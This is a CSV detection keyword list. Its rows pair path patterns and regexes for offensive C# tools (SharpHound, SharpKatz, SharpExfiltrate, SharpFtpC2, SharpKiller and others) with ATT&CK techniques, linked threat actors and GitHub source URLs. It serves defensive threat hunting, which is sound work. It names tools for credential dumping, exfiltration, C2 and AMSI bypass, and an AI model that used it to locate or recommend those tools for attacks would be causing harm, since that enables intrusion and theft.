"*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10970"
"*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10971"
"*/SharpExec.exe*",".{0,1000}\/SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10972"
"*/SharpExfil.git*",".{0,1000}\/SharpExfil\.git.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","1","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","10973"
"*/SharpExfiltrate.git*",".{0,1000}\/SharpExfiltrate\.git.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","10974"
"*/SharpExfiltrate/*",".{0,1000}\/SharpExfiltrate\/.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","10975"
"*/SharpExShell.exe*",".{0,1000}\/SharpExShell\.exe.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","10976"
"*/SharpExShell.git*",".{0,1000}\/SharpExShell\.git.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","1","N/A","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","10977"
"*/SharpFinder.exe*",".{0,1000}\/SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10978"
"*/SharpFtpC2.git*",".{0,1000}\/SharpFtpC2\.git.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","10979"
"*/SharpFtpC2/tarball/*",".{0,1000}\/SharpFtpC2\/tarball\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","10980"
"*/SharpFtpC2/zipball/*",".{0,1000}\/SharpFtpC2\/zipball\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","10981"
"*/SharpGetTitle.exe*",".{0,1000}\/SharpGetTitle\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10982"
"*/SharpGhostTask*",".{0,1000}\/SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","10983"
"*/SharpGmailC2.git*",".{0,1000}\/SharpGmailC2\.git.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","10984"
"*/SharpGpo.exe*",".{0,1000}\/SharpGpo\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10985"
"*/SharpGpo.exe*",".{0,1000}\/SharpGpo\.exe.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10986"
"*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10987"
"*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10988"
"*/SharpGPOAbuse.exe*",".{0,1000}\/SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10989"
"*/SharpGraphView.git*",".{0,1000}\/SharpGraphView\.git.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","1","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","10990"
"*/SharpHandler.exe*",".{0,1000}\/SharpHandler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10991"
"*/SharpHandler.exe*",".{0,1000}\/SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10992"
"*/SharpHandler.py*",".{0,1000}\/SharpHandler\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","10993"
"*/SharpHide.exe*",".{0,1000}\/SharpHide\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10994"
"*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","10995"
"*/SharpHide.git*",".{0,1000}\/SharpHide\.git.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","10996"
"*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10997"
"*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10998"
"*/SharpHose.exe*",".{0,1000}\/SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","1","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","10999"
"*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11000"
"*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11001"
"*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11002"
"*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11003"
"*/SharpHound.exe*",".{0,1000}\/SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11004"
"*/SharpHound.ps1*",".{0,1000}\/SharpHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","11005"
"*/SharpHound-v*.zip*",".{0,1000}\/SharpHound\-v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","11006"
"*/SharpIncrease.exe*",".{0,1000}\/SharpIncrease\.exe.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","11007"
"*/SharpIncrease.git*",".{0,1000}\/SharpIncrease\.git.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","11008"
"*/Sharpire.exe*",".{0,1000}\/Sharpire\.exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11009"
"*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11010"
"*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11011"
"*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11012"
"*/SharpKatz.exe*",".{0,1000}\/SharpKatz\.exe.{0,1000}","offensive_tool_keyword","SharpKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11013"
"*/SharpKiller.git*",".{0,1000}\/SharpKiller\.git.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","11014"
"*/Sharp-Killer.sln*",".{0,1000}\/Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","11015"
"*/SharpLAPS.exe*",".{0,1000}\/SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11016"
